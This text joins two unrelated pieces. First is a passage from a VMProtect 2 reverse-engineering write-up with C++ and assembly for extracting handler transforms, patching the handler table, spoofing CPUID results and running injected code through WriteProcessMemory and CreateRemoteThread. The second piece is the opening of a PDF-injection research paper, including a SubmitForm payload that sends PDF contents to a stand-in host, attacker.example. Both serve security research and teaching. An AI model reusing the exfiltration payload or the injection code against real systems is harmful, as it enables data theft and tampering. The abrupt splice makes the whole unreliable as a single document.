            return transforms<std::uint16_t>[op](a, b);
        case 32:
            return transforms<std::uint32_t>[op](a, b);
        case 64:
            return transforms<std::uint64_t>[op](a, b);
        default:
            throw std::invalid_argument("invalid bit size...");
        }
    }
    // ...
}
This small snippet of code allows transformations to be implemented easily in C++ with overflows in mind. It is very important that operand sizes are respected during transformation; without the correct size, overflows as well as rotates and shifts will produce incorrect results. The code below is an example of how to decrypt the operands of a virtual instruction by applying the transformations dynamically in C++.

// here for your eyes - better understanding of the code :^)
using map_t = std::map<transform::type, ZydisDecodedInstruction>;

auto decrypt_operand(transform::map_t& transforms,
    std::uint64_t operand, std::uint64_t rolling_key)
    -> std::pair<std::uint64_t, std::uint64_t>
{
    const auto key_decrypt = &transforms[transform::type::rolling_key];
    const auto generic_decrypt_1 = &transforms[transform::type::generic1];
    const auto generic_decrypt_2 = &transforms[transform::type::generic2];
    const auto generic_decrypt_3 = &transforms[transform::type::generic3];
    const auto update_key = &transforms[transform::type::update_key];

// apply transformation with rolling decrypt key...
operand = transform::apply(key_decrypt->operands[0].size,
    key_decrypt->mnemonic, operand, rolling_key);

// apply three generic transformations...
{
    operand = transform::apply(
        generic_decrypt_1->operands[0].size,
        generic_decrypt_1->mnemonic, operand, 
        // check to see if this instruction has an IMM...
        transform::has_imm(generic_decrypt_1) ? 
            generic_decrypt_1->operands[1].imm.value.u : 0);

    operand = transform::apply(
        generic_decrypt_2->operands[0].size,
        generic_decrypt_2->mnemonic, operand,
        // check to see if this instruction has an IMM...
        transform::has_imm(generic_decrypt_2) ?
            generic_decrypt_2->operands[1].imm.value.u : 0);

    operand = transform::apply(
        generic_decrypt_3->operands[0].size,
        generic_decrypt_3->mnemonic, operand,
        // check to see if this instruction has an IMM...
        transform::has_imm(generic_decrypt_3) ?
            generic_decrypt_3->operands[1].imm.value.u : 0);
}

// update rolling key...
rolling_key = transform::apply(key_decrypt->operands[0].size,
    key_decrypt->mnemonic, rolling_key, operand);

    return { operand, rolling_key };
}
Extracting Transformations — Static Analysis Continued
The ability to reimplement transformations is important; however, being able to parse the transformations out of vm handlers and calc_jmp is another problem in itself. In order to determine where transformations are, we must first determine whether there is a need for them. Transformations are only applied to operands of virtual instructions. The first operand of a virtual instruction is always transformed in the same place; this code is known as calc_jmp, which I explained earlier. The second place where transformations will be found is inside of vm handlers which handle immediate values. In other words, if a virtual instruction has an immediate value, there will be a unique set of transformations for that operand. Immediate values are read out of VIP (RSI), so we can use this key detail to determine if there is an immediate value as well as its size. It is important to note that the size of the immediate value read out of VIP does not always equal the size allocated for the decrypted value on the stack, because instructions such as LCONST come in sign extended and zero extended variants. Let’s examine an example virtual instruction which has an immediate value. This virtual instruction is called LCONSTWSE, which stands for “load constant value of size word but sign extended to a DWORD”. The deobfuscated vm handler for this virtual instruction looks like so:

.vmp0:0000000140004478 66 0F B7 06 movzx ax, word ptr [rsi]
.vmp0:0000000140004412 66 29 D8 sub ax, bx
.vmp0:0000000140004416 66 D1 C0 rol ax, 1
.vmp0:0000000140004605 66 F7 D8 neg ax
.vmp0:000000014000460A 66 35 AC 21 xor ax, 21ACh
.vmp0:000000014000460F 66 29 C3 sub bx, ax
.vmp0:0000000140004613 98 cwde
.vmp0:0000000140004618 48 83 ED 04 sub rbp, 4
.vmp0:0000000140006E4F 89 45 00 mov [rbp+0], eax
.vmp0:0000000140007E2D 48 8D 76 02 lea rsi, [rsi+2]
As you can see, two bytes are read out of VIP by the first instruction. This is something we can look for with Zydis. Any MOVZX, MOVSX, or MOV where RAX is the destination and RSI is the source shows that there is an immediate value, and thus we know that five transformations are expected in the instruction stream. We can then search for an instruction where RAX is the destination and RBX is the source. This will be the first transformation. In the above example, the first subtraction instruction is what we are looking for.

.vmp0:0000000140004412 66 29 D8 sub ax, bx
Next we can look for three instructions which have a write dependency on RAX. These three instructions will be the generic transformations applied to the operand.

.vmp0:0000000140004416 66 D1 C0 rol ax, 1
.vmp0:0000000140004605 66 F7 D8 neg ax
.vmp0:000000014000460A 66 35 AC 21 xor ax, 21ACh
At this point the operand is completely decrypted. The only thing left is a single transformation done to the rolling decryption key (RBX). This last transformation updates the rolling decryption key.

.vmp0:000000014000460F 66 29 C3 sub bx, ax
All of these transformation instructions can now be re-implemented by C++ lambdas on the fly. Using std::find_if is very useful for these types of searching algorithms as you can take it one step at a time: first locate the key transformation, then find the next three instructions which write to RAX.

bool vm::handler::get_transforms(const zydis_routine_t& vm_handler, transform::map_t& transforms)
{
    auto imm_fetch = std::find_if(
        vm_handler.begin(), vm_handler.end(),
        [](const zydis_instr_t& instr_data) -> bool
        {
            // mov/movsx/movzx rax/eax/ax/al, [rsi]
            if (instr_data.instr.operand_count > 1 &&
                (instr_data.instr.mnemonic == ZYDIS_MNEMONIC_MOV ||
                    instr_data.instr.mnemonic == ZYDIS_MNEMONIC_MOVSX ||
                    instr_data.instr.mnemonic == ZYDIS_MNEMONIC_MOVZX) &&
                instr_data.instr.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
                util::reg::compare(instr_data.instr.operands[0].reg.value, ZYDIS_REGISTER_RAX) &&
                instr_data.instr.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY &&
                instr_data.instr.operands[1].mem.base == ZYDIS_REGISTER_RSI)
                return true;
            return false;
        }
    );

    if (imm_fetch == vm_handler.end())
        return false;

    // this finds the first transformation which looks like:
    // transform rax, rbx <--- note these registers can be smaller so we to64 them...
    auto key_transform = std::find_if(imm_fetch, vm_handler.end(),
        [](const zydis_instr_t& instr_data) -> bool
        {
            if (util::reg::compare(instr_data.instr.operands[0].reg.value, ZYDIS_REGISTER_RAX) &&
                util::reg::compare(instr_data.instr.operands[1].reg.value, ZYDIS_REGISTER_RBX))
                return true;
            return false;
        }
    );

    // bail out if no key transformation was found before touching it...
    if (key_transform == vm_handler.end())
        return false;

    // last transformation is the same as the first except src and dest are swapped...
    transforms[transform::type::rolling_key] = key_transform->instr;
    auto instr_copy = key_transform->instr;
    instr_copy.operands[0].reg.value = key_transform->instr.operands[1].reg.value;
    instr_copy.operands[1].reg.value = key_transform->instr.operands[0].reg.value;
    transforms[transform::type::update_key] = instr_copy;

// three generic transformations...
auto generic_transform = key_transform;

for (auto idx = 0u; idx < 3; ++idx)
{
    generic_transform = std::find_if(++generic_transform, vm_handler.end(),
        [](const zydis_instr_t& instr_data) -> bool
        {
            if (util::reg::compare(instr_data.instr.operands[0].reg.value, ZYDIS_REGISTER_RAX))
                return true;

            return false;
        }
    );

    if (generic_transform == vm_handler.end())
        return false;

    transforms[(transform::type)(idx + 1)] = generic_transform->instr;
}

    return true;
}
As you can see above, the first transformation is the same as the last transformation except the source and destination operands are swapped. VMProtect 2 takes some creative liberties when applying the last transformation and can sometimes push the rolling decryption key onto the stack, apply the transformation, then pop the result back into RBX. This small but significant inconvenience can be handled by simply swapping the destination and source registers in the ZydisDecodedInstruction variable, as demonstrated in the above code.

Static Analysis Dilemma — Static Analysis Conclusion
The dilemma with trying to statically analyze virtual instructions is that branching operations inside of the virtual machine are very difficult to handle. In order to calculate where a virtual JMP is jumping to, emulation is required. I will be pursuing this in the near future (using Unicorn).

vmtracer — Tracing Virtual Instructions
Virtual instruction tracing is trivially achievable by patching every single vm handler table entry to an encrypted value which, when decrypted, points to a trap handler. This allows for inter-instruction inspection of registers as well as the possibility of altering the result of a vm handler. In order to make good use of this feature, it’s important to understand which registers contain which values; refer to the “Overview” section of this post.

The first and most important piece of information to log when intercepting virtual instructions is the opcode value, which is located in AL. Logging this tells us all of the virtual instructions executed. The next value which must be logged is the rolling decryption key, which is located in BL. This allows vmprofiler to decrypt operands statically.

Since we are able to, we also log all scratch registers after every single virtual instruction, as this paints an even bigger picture of what values are being manipulated. Lastly, the top five QWORD values on the virtual stack are logged to provide even more context since, again, this virtual instruction set architecture is based on a stack machine.

To conclude the dynamic analysis section of this post, I have created a small file format for this runtime data. The file format is called “vmp2” and contains all runtime log information. The structures for this file format are very simple and are listed below.

namespace vmp2
{
    enum class exec_type_t
    {
        forward,
        backward
    };

enum class version_t
{
    invalid,
    v1 = 0x101
};

struct file_header
{
    u32 magic; // VMP2
    u64 epoch_time;
    u64 module_base;
    exec_type_t advancement;
    version_t version;
    u32 entry_count;
    u32 entry_offset;
};

struct entry_t
{
    u8 handler_idx;
    u64 decrypt_key;
    u64 vip;

    union
    {
        struct
        {
            u64 r15;
            u64 r14;
            u64 r13;
            u64 r12;
            u64 r11;
            u64 r10;
            u64 r9;
            u64 r8;
            u64 rbp;
            u64 rdi;
            u64 rsi;
            u64 rdx;
            u64 rcx;
            u64 rbx;
            u64 rax;
            u64 rflags;
        };
        u64 raw[16];
    } regs;

    union
    {
        u64 qword[0x28];
        u8 raw[0x140];
    } vregs;

    union
    {
        u64 qword[0x20];
        u8 raw[0x100];
    } vsp;
};

}
vmprofile-cli — Static Analysis Using Runtime Traces
Provided a “vmp2” file, vmprofiler will produce pseudo virtual instructions including immediate values as well as affected scratch registers. This is not devirtualization by any means, nor does it provide a view of multiple code paths, however it does give a very useful trace of executed virtual instructions. Vmprofiler can also be used to statically locate the vm handler table and determine what transformation is used to decrypt these vm handler entries.

The output of vmprofiler includes all information about every vm handler: the immediate value bit size, the virtual instruction name, and the five transformations applied to the immediate value, if there is one.

==========[vm handler LCONSTCBW, imm size = 8]=======
================[vm handler instructions]============

0x00007FF65BAE5C2E movzx eax, byte ptr [rsi]
0x00007FF65BAE5C82 add al, bl
0x00007FF65BAE5C85 add al, 0xD3
0x00007FF65BAE6FC7 not al
0x00007FF65BAE4D23 inc al
0x00007FF65BAE5633 add bl, al
0x00007FF65BAE53D5 sub rsi, 0xFFFFFFFFFFFFFFFF
0x00007FF65BAE5CD1 sub rbp, 0x02
0x00007FF65BAE62F8 mov [rbp], ax
=================[vm handler transforms]=============
add al, bl
add al, 0xD3
not al
inc al

add bl, al

The transformations, if any, are extracted as well from the vm handler and can be executed dynamically to decrypt operands.

SREGQ 0x0000000000000088 (VSP[0] = 0x00007FF549600000) (VSP[1] = 0x0000000000000000)
LCONSTDSX 0x000000007D361173 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x0000000000000000)
ADDQ (VSP[0] = 0x000000007D361173) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000010 (VSP[0] = 0x0000000000000202) (VSP[1] = 0x000000007D361173)
SREGQ 0x0000000000000048 (VSP[0] = 0x000000007D361173) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000000 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x0000000000000100)
SREGQ 0x0000000000000038 (VSP[0] = 0x0000000000000100) (VSP[1] = 0x00000000000000B8)
SREGQ 0x0000000000000028 (VSP[0] = 0x00000000000000B8) (VSP[1] = 0x0000000000000246)
SREGQ 0x00000000000000B8 (VSP[0] = 0x0000000000000246) (VSP[1] = 0x0000000000000100)
SREGQ 0x0000000000000010 (VSP[0] = 0x0000000000000100) (VSP[1] = 0x000000892D8FDA88)
SREGQ 0x00000000000000B0 (VSP[0] = 0x000000892D8FDA88) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000040 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x0000000000000020)
SREGQ 0x0000000000000030 (VSP[0] = 0x0000000000000020) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000020 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x2AAAAAAAAAAAAAAB)
// …
Displaying Trace Information — vmprofiler-qt
In order to display all traced information such as native register values, scratch register values and virtual stack values I have created a very small Qt project which will allow you to step through a trace. I felt that a console was way too restrictive and I also found it hard to prioritize what needs to be displayed on the console, thus the need for a GUI.

Virtual Machine Behavior
After the vm_entry routine executes, all registers that were pushed onto the stack are loaded into virtual machine scratch registers. This also extends to the module base and RFLAGS, which were also pushed onto the stack. Native registers are not mapped to any fixed scratch registers.

Another behavior which the virtual machine architecture exhibits is that if a native instruction is not implemented with vm handlers a vmexit will happen to execute the native instruction. In my version of VMProtect 2 CPUID is not implemented with vm handlers so an exit happens.

Prior to a vmexit, values from scratch registers are loaded onto the virtual stack. The vmexit virtual instruction then puts these values back into native registers. You can see that the scratch registers differ from the ones directly after a vmentry; this is because, as stated before, scratch registers are not mapped to specific native registers.

Demo — Creating and Inspecting A Virtual Trace
For this demo I will be virtualizing a very simple binary which just executes CPUID and returns true if AVX is supported, else it returns false. The assembly code for this is displayed below.

.text:00007FF776A01000 ; int __fastcall main()
.text:00007FF776A01000 public main
.text:00007FF776A01000 push rbx
.text:00007FF776A01002 sub rsp, 10h
.text:00007FF776A01006 xor ecx, ecx
.text:00007FF776A01008 mov eax, 1
.text:00007FF776A0100D cpuid
.text:00007FF776A0100F shr ecx, 1Ch
.text:00007FF776A01012 and ecx, 1
.text:00007FF776A01015 mov eax, ecx
.text:00007FF776A01017 add rsp, 10h
.text:00007FF776A0101B pop rbx
.text:00007FF776A0101C retn
.text:00007FF776A0101C main endp
When protecting this code I opted out of packing, for simplicity of the demonstration. I protected the binary with “Ultra” settings, which is just obfuscation + virtualization. Looking at the PE header of the output file, we can see that the entry point RVA is 0x1000 and the image base is 0x140000000. We can now give this information to vmprofiler-cli and it should give us the vm handler table RVA as well as all of the vm handler information.

vmprofiler-cli.exe --vmpbin vmptest.vmp.exe --vmentry 0x1000 --imagebase 0x140000000

0x00007FF670F2822C push 0xFFFFFFFF890001FA
0x00007FF670F27FC9 push 0x45D3BF1F
0x00007FF670F248E4 push r13
0x00007FF670F24690 push rsi
0x00007FF670F24E53 push r14
0x00007FF670F274FB push rcx
0x00007FF670F2607C push rsp
0x00007FF670F24926 pushfq
0x00007FF670F24DC2 push rbp
0x00007FF670F25C8C push r12
0x00007FF670F252AC push r10
0x00007FF670F251A5 push r9
0x00007FF670F25189 push rdx
0x00007FF670F27D5F push r8
0x00007FF670F24505 push rdi
0x00007FF670F24745 push r11
0x00007FF670F2478B push rax
0x00007FF670F27A53 push rbx
0x00007FF670F2500D push r15
0x00007FF670F26030 push [0x00007FF670F27912]
0x00007FF670F2593A mov rax, 0x7FF530F20000
0x00007FF670F25955 mov r13, rax
0x00007FF670F25965 push rax
0x00007FF670F2596F mov esi, [rsp+0xA0]
0x00007FF670F25979 not esi
0x00007FF670F25985 neg esi
0x00007FF670F2598D ror esi, 0x1A
0x00007FF670F2599E mov rbp, rsp
0x00007FF670F259A8 sub rsp, 0x140
0x00007FF670F259B5 and rsp, 0xFFFFFFFFFFFFFFF0
0x00007FF670F259C1 mov rdi, rsp
0x00007FF670F259CB lea r12, [0x00007FF670F26473]
0x00007FF670F259DF mov rax, 0x100000000
0x00007FF670F259EC add rsi, rax
0x00007FF670F259F3 mov rbx, rsi
0x00007FF670F259FA add rsi, [rbp]
0x00007FF670F25A05 mov al, [rsi]
0x00007FF670F25A0A xor al, bl
0x00007FF670F25A11 neg al
0x00007FF670F25A19 rol al, 0x05
0x00007FF670F25A26 inc al
0x00007FF670F25A2F xor bl, al
0x00007FF670F25A34 movzx rax, al
0x00007FF670F25A41 mov rdx, [r12+rax*8]
0x00007FF670F25A49 xor rdx, 0x7F3D2149
0x00007FF670F25507 inc rsi
0x00007FF670F27951 add rdx, r13
0x00007FF670F27954 jmp rdx

located vm handler table... at = 0x00007FF670F26473, rva = 0x0000000140006473

We can see that vmprofiler-cli has flattened and deobfuscated the vm_entry code as well as located the vm handler table. We can also see the transformation done to decrypt vm handler entries; it’s the XOR directly after mov rdx, [r12+rax*8].

0x00007FF670F25A41 mov rdx, [r12+rax*8]
0x00007FF670F25A49 xor rdx, 0x7F3D2149
We can also see that VIP advanced positively as RSI is incremented by the INC instruction.

0x00007FF670F25507 inc rsi
Armed with this information we can now compile a vmtracer program which will patch all vm handler table entries to our trap handler which will allow us to trace virtual instructions as well as alter virtual instruction results.

// lambdas to encrypt and decrypt vm handler entries
// you must extract this information from the flattened
// and deobfuscated view of vm_entry...

vm::decrypt_handler_t _decrypt_handler =
    [](u64 val) -> u64
    {
        return val ^ 0x7F3D2149;
    };

vm::encrypt_handler_t _encrypt_handler =
    [](u64 val) -> u64
    {
        return val ^ 0x7F3D2149;
    };

vm::handler::edit_entry_t _edit_entry =
    [](u64* entry_ptr, u64 val) -> void
    {
        DWORD old_prot;
        VirtualProtect(entry_ptr, sizeof val,
            PAGE_EXECUTE_READWRITE, &old_prot);

        *entry_ptr = val;
        VirtualProtect(entry_ptr, sizeof val,
            old_prot, &old_prot);
    };

// create vm trace file header...
vmp2::file_header trace_header;
memcpy(&trace_header.magic, "VMP2", sizeof "VMP2" - 1);
trace_header.epoch_time = time(nullptr);
trace_header.entry_offset = sizeof trace_header;
trace_header.advancement = vmp2::exec_type_t::forward;
trace_header.version = vmp2::version_t::v1;
trace_header.module_base = module_base;
I have omitted some of the other code such as the ofstream code and vmtracer class instantiation, you can find that code here. The main purpose of displaying this information is to show you how to parse a vm_entry and extract the information which is required to create a trace.

In my demo tracer I simply LoadLibraryExA the protected binary, initialize a vmtracer class, patch the vm handler table, then call the entry point of the module. This is far from ideal, however for demonstration purposes it will suffice.

// patch vm handler table...
tracer.start();

// call entry point... (the function-pointer cast here is a
// reconstruction; the original angle brackets were lost)
auto result = reinterpret_cast<int (*)()>(
    NT_HEADER(module_base)->OptionalHeader.AddressOfEntryPoint + module_base)();

// unpatch vm handler table...
tracer.stop();
Now that a trace file has been created, we can inspect the trace via vmprofiler-cli or vmprofiler-qt. However, I would suggest the latter, as it was explicitly created to view trace files.

When loading a trace file into vmprofiler-qt, one must know the vm_entry RVA as well as the image base found in the optional header of the PE file. Given all of this information as well as the original protected binary, vmprofiler-qt will display all virtual instructions in a trace file and allow you to “single step” through it.

Let’s look at the trace file and see if we can locate the original instructions, which have now been converted to a RISC, stack-machine-based architecture. The first block of code that executes after vm_entry seems to contain no code pertaining to the original binary. It is here simply for obfuscation purposes and to prevent static analysis of virtual instructions, since understanding where the virtual JMP instruction lands would require emulation of the virtual instruction set. This first jump block is located inside of every protected binary.

The next block following the virtual JMP instruction does a handful of interesting math operations pertaining to the stack. If you look closely you can see that the math operation being executed is: sub(x, y) = ~((~(x) & ~(x)) + y) & ~((~(x) & ~(x)) + y); in this case sub(VSP, 0x10).

If we simplify this math operation we can see that the operation is a subtraction done to VSP. sub(x, y) = ~((~x) + y). This is equivalent to the native operation sub rsp, 0x10. If we look at the original binary, the one that is not virtualized, we can see that there is in fact this instruction.

The mov eax, 1 displayed above can be seen in the virtual instructions shortly after the subtraction done on VSP. The MOV EAX, 1 is done via an LCONSTBSX and an SREGDW. The SREG bit size matches the native register width of 32 bits, as does the constant value being loaded into it.

Next we see that a vmexit happens. We can see where code execution will continue outside of the virtual machine by going to the last ADDQ prior to the vmexit. The first two values on the stack should be the module base address and the 32-bit relative virtual address of the routine that will be returned to. In this trace the RVA is 0x140008236. If we inspect this address in IDA we can see that the instruction “CPUID” is here.

.vmp0:0000000140008236 0F A2 cpuid
.vmp0:0000000140008238 0F 81 88 FE FF FF jno loc_1400080C6
.vmp0:000000014000823E 68 05 02 00 79 push 79000205h
.vmp0:0000000140008243 E9 77 FD FF FF jmp loc_140007FBF
As you can see, directly after the CPUID instruction, code execution enters back into the virtual machine. Directly after setting all virtual scratch registers with native register values located on the virtual stack a constant is loaded onto the stack with the value of 0x1C. The resulting value from CPUID is then shifted to the right by this constant value.

The AND operation is done with two NAND operations. The first NAND simply inverts the result from the SHR; invert(x) = ~(x) & ~(x). This is done by loading the DWORD value twice onto the stack to make a single QWORD.

The result of this AND operation is then set into virtual scratch register seven (SREGDW 0x38). It is then moved into scratch register 16. If we look at the vmexit instruction and the order in which LREGQ’s are executed we can see that this is indeed correct.

Lastly, we can also see the ADD instruction and LVSP instruction which adds a value to VSP. This is expected as there is an ADD RSP, 0x10 in the original binary.

From the information above we can reconstruct the following native instructions:

sub rsp, 0x10
mov eax, 1
cpuid
shr ecx, 0x1C
and ecx, 1
mov eax, ecx ; from the LREGDW 0x38; SREGDW 0x80…
add rsp, 0x10
ret
As you can see, a few instructions are missing, particularly the pushes and pops of RBX, as well as the XOR used to zero the contents of ECX. I assume that these instructions are not converted to virtual instructions directly and are instead implemented in a roundabout way.

Altering Virtual Instruction Results
In order to alter a virtual instruction’s result, one must first reimplement the entire vm handler. If the vm handler decrypts a second operand, the validity of the rolling decryption key must be preserved: the original immediate value must be computed and applied to the decryption key via the original transformation, although the value itself can be discarded after updating the key. An example of this is altering the constant value loaded by the LCONST prior to the SHR in the above section.

This virtual instruction has two operands, the first being the vm handler index to execute and the second being the immediate value which in this case is a single byte. Since there are two operands there will be five transformations inside of the vm handler.

We can recode this vm handler and compare the decrypted immediate value with 0x1C, then branch to a subroutine to load a different value onto the stack. This will then result in the SHR computing a different result. Essentially, we can spoof the CPUID results. An alternative would be recreating the SHR handler; however, for simplicity’s sake I’m just going to shift to a bit that is set. In this case, bit 5 in ECX after CPUID is set if VMX is supported, and since my CPU supports virtualization this bit will be high. Below is the new vm handler.

.data
__mbase dq 0h
public __mbase

.code
__lconstbzx proc
    mov al, [rsi]
    lea rsi, [rsi+1]
    xor al, bl
    dec al
    ror al, 1
    neg al
    xor bl, al

    pushfq              ; save flags...
    cmp ax, 01Ch
    je swap_val

                        ; the constant is not 0x1C
    popfq               ; restore flags...
    sub rbp, 2
    mov [rbp], ax
    mov rax, __mbase
    add rax, 059FEh     ; calc_jmp rva is 0x59FE...
    jmp rax

swap_val:               ; the constant is 0x1C
    popfq               ; restore flags...
    mov ax, 5           ; bit 5 is VMX in ECX after CPUID...
    sub rbp, 2
    mov [rbp], ax
    mov rax, __mbase
    add rax, 059FEh     ; calc_jmp rva is 0x59FE...
    jmp rax
__lconstbzx endp
end
If we now run the vm tracer again with this new vm handler being set to index 0x55 we should be able to see a change in LCONSTBZX. In order to facilitate this hook, one must set the virtual address of the new vm handler into a vm::handler::table_t object.

// change vm handler 0x55 (LCONSTBZX) to our implementation of it...
auto _meta_data = handler_table.get_meta_data(0x55);
_meta_data.virt = reinterpret_cast<u64>(&__lconstbzx);
handler_table.set_meta_data(0x55, _meta_data);
If we run the binary now, it will return 1.

Encoding Virtual Instructions — Inverse Transformations
Since VMProtect 2 generates a virtual machine which executes virtual instructions encoded in its own bytecode, one could run their own virtual instructions on the VM if they can encode them. The encoded virtual instructions must, however, be within a 4GB address range of the module, as the RVA to the virtual instructions is 32 bits wide. In this section I will encode a very simple set of virtual instructions to add two QWORD values together and return the result.

To begin, encoding virtual instructions requires that the vm handlers for said virtual instructions exist inside of the binary. Locating these vm handlers is done by vmprofiler. The vm handler index is the first operand and the immediate value, if any, is the second. Combining these two operands yields an encoded virtual instruction. This is the first stage of assembling virtual instructions; the second is encrypting the operands.

Once we have our encoded virtual instructions we can now encrypt them using the inverse operations of vm handler transformations as well as the inverse operations for calc_jmp. It’s important to note that the way in which VIP advances must be taken into consideration when encrypting as the order of operands and virtual instructions depends on this advancement direction.

In order to execute these newly assembled virtual instructions, one must put them within a 32-bit address range of the vm_entry routine, put the encrypted RVA to these virtual instructions onto the stack, and lastly call into vm_entry. I would suggest using VirtualAllocEx to allocate a RW page directly below the protected module. An example of running virtual instructions is displayed below.

SIZE_T bytes_copied;
DWORD tid = 0;
STARTUPINFOA info = { sizeof info };
PROCESS_INFORMATION proc_info;

// start the protected binary suspended...
// keep in mind this binary is not packed...
CreateProcessA("vmptest.vmp.exe", nullptr, nullptr,
    nullptr, false,
    CREATE_SUSPENDED | CREATE_NEW_CONSOLE,
    nullptr, nullptr, &info, &proc_info);

// wait for the system to finish setting up...
WaitForInputIdle(proc_info.hProcess, INFINITE);
auto module_base = get_process_base(proc_info.hProcess);

// allocate space for the virtual instructions below the module...
auto virt_instrs = VirtualAllocEx(proc_info.hProcess,
    module_base + vmasm->header->offset,
    vmasm->header->size,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// write the virtual instructions...
WriteProcessMemory(proc_info.hProcess, virt_instrs,
    vmasm->data, vmasm->header->size, &bytes_copied);

// create a thread to run the virtual instructions...
auto thandle = CreateRemoteThread(proc_info.hProcess,
    nullptr, 0u,
    reinterpret_cast<LPTHREAD_START_ROUTINE>(module_base + vm_entry_rva),
    nullptr, CREATE_SUSPENDED, &tid);

CONTEXT thread_ctx;
thread_ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(thandle, &thread_ctx);

// sub rsp, 8...
thread_ctx.Rsp -= 8;
thread_ctx.Rip = module_base + vm_entry_rva;

// write encrypted rva onto the stack...
WriteProcessMemory(proc_info.hProcess,
    reinterpret_cast<void*>(thread_ctx.Rsp),
    &vmasm->header->encrypted_rva,
    sizeof vmasm->header->encrypted_rva, &bytes_copied);

// update thread context and resume execution...
SetThreadContext(thandle, &thread_ctx);
ResumeThread(thandle);
Conclusion — Static Analysis, Dynamic Analysis
To conclude, my dynamic analysis solution is not the most ideal; however, it should allow for basic reverse engineering of protected binaries. With more time, static analysis of virtual instructions will become possible, but for the time being dynamic analysis will have to do. In the future I will be using Unicorn to emulate the virtual machine handlers.

Although I have documented a handful of virtual instructions there are many more that I have not documented. The goal of documenting the virtual instructions that I have is to allow the reader of this article to obtain a feel for how vm handlers should look as well as how one could alter the results of these vm handlers. The documented virtual instructions in this article are also the most common ones. These virtual instructions will most likely be inside of every virtual machine.

I have added a handful of reference builds inside of the repository for you to try your hand at making them return 1 by altering vm handlers. There is also a build which uses multiple virtual machines in a single binary.

Lastly, I would like to restate that this research has most definitely already been done by private entities, and I am not the first to document some of the virtual machine architecture discussed in this post. I have credited those whose research I have studied; however, there are probably many more people who have done research on VMProtect 2 that I have not listed, simply because I have not come across their work.

Portable Data exFiltration: XSS for PDFs

Original text by Gareth Heyes

Abstract

PDF documents and PDF generators are ubiquitous on the web, and so are injection vulnerabilities. Did you know that controlling a measly HTTP hyperlink can provide a foothold into the inner workings of a PDF? In this paper, you will learn how to use a single link to compromise the contents of a PDF and exfiltrate it to a remote server, just like a blind XSS attack.

I’ll show how you can inject PDF code to escape objects, hijack links, and even execute arbitrary JavaScript — basically XSS within the bounds of a PDF document. I evaluate several popular PDF libraries for injection attacks, as well as the most common readers: Acrobat and Chrome’s PDFium. You’ll learn how to create the “alert(1)” of PDF injection and how to improve it to inject JavaScript that can steal the contents of a PDF on both readers.

I’ll share how I was able to use a custom JavaScript enumerator on the various PDF objects to discover functions that make external requests, enabling me to exfiltrate data from the PDF. Even PDFs loaded from the filesystem in Acrobat, which have more rigorous protection, can still be made to make external requests. I’ve successfully crafted an injection that can perform an SSRF attack on a PDF rendered server-side. I’ve also managed to read the contents of files from the same domain, even when the Acrobat user agent is blocked by a WAF. Finally, I’ll show you how to steal the contents of a PDF without user interaction, and wrap up with a hybrid PDF that works on both PDFium and Acrobat.

This whitepaper is also available as a printable PDF, and as a “director’s cut” edition of a presentation premiered at Black Hat Europe 2020.

Introduction

It all started when my colleague, James “albinowax” Kettle, was watching a talk on PDF encryption at BlackHat. He was looking at the slides and thought “This is definitely injectable”. When he got back to the office, we had a discussion about PDF injection. At first, I dismissed it as impossible. You wouldn’t know the structure of the PDF and, therefore, wouldn’t be able to inject the correct object references. In theory, you could do this by injecting a whole new xref table, but this won’t work in practice as your new table will simply be ignored… Here at PortSwigger, we don’t stop there; we might initially think an idea is impossible but that won’t stop us from trying.

Before I began testing, I had a couple of research objectives in mind. Given user input into a PDF, could I break it and cause parsing errors? Could I execute JavaScript or exfiltrate the contents of the PDF? I wanted to test two different types of injection: informed and blind. Informed injection refers to cases where I knew the structure of the PDF (for example, because I was able to view the resulting PDF myself). With blind injection, I had no knowledge at all of the PDF’s structure or contents, much like blind XSS.

Injection theory

How can user input get inside PDFs?

Server-side PDF generation is everywhere; it’s in e-tickets, receipts, boarding passes, invoices, pay slips…the list goes on. So there’s plenty of opportunity for user input to get inside a PDF document. The most likely targets for injection are text streams or annotations as these objects allow developers to embed text or a URI, enclosed within parentheses. If a malicious user can inject parentheses, then they can inject PDF code and potentially insert their own harmful PDF objects or actions.

Why try to inject PDF code?

Consider an application where multiple users work on a shared PDF containing sensitive information, such as bank details. If you are able to control part of that PDF via an injection, you could potentially exfiltrate the entire contents of the file when another user accesses it or interacts with it in some way. This works just like a classic XSS attack but within the scope of a PDF document.

Why can’t you inject arbitrary content?

Think about PDF injection just like an XSS injection inside a JavaScript function call. In this case, you would need to ensure that your syntax was valid by closing the parentheses before your injection and repairing the parentheses after your injection. The same principle applies to PDF injection, except you are injecting inside a dictionary value, such as a text stream or annotation URI, rather than a function call.

Methodology

Methodology

I have devised the following methodology for PDF injection: Identify, Construct, and Exploit.

Identify

First of all, you need to identify whether the PDF generation library is escaping parentheses or backslashes. You can also try to generate these characters by using multi-byte characters that contain 0x5c (backslash) or 0x29 (parenthesis) in the hope the library incorrectly converts them to single-byte characters. Another possible method of generating parentheses or backslashes is to use characters outside the ASCII range. This can cause an overflow if the library incorrectly handles the character. You should then see if you can break the PDF structure by injecting a NULL character, EOF markers, or comments.

Construct

Once you’ve established that you can influence the structure of the PDF, you need to construct an injection that confirms you control part of it. This can be done by calling “app.alert(1)” in PDF JavaScript or by using the submitForm action/function to make a POST request to an external URL. This is useful for blind injection scenarios.

Exploit

Once you’ve confirmed that an injection is possible, you can try to exploit it to exfiltrate the contents of the PDF. Depending on whether you’re injecting the SubmitForm action or using the submitForm JavaScript function, you need to send the correct flags or parameters. I’ll show you how to do this later on in the paper when I cover how to exploit injections.
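As a rough, hypothetical sketch (the URL is a placeholder and the correct /Flags value depends on the submission format you want), an injected SubmitForm action dictionary has this general shape:

```
/A <<
  /Type /Action
  /S /SubmitForm
  /F (https://attacker.example/collect)
  /Flags 0
>>
```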

Vulnerable libraries

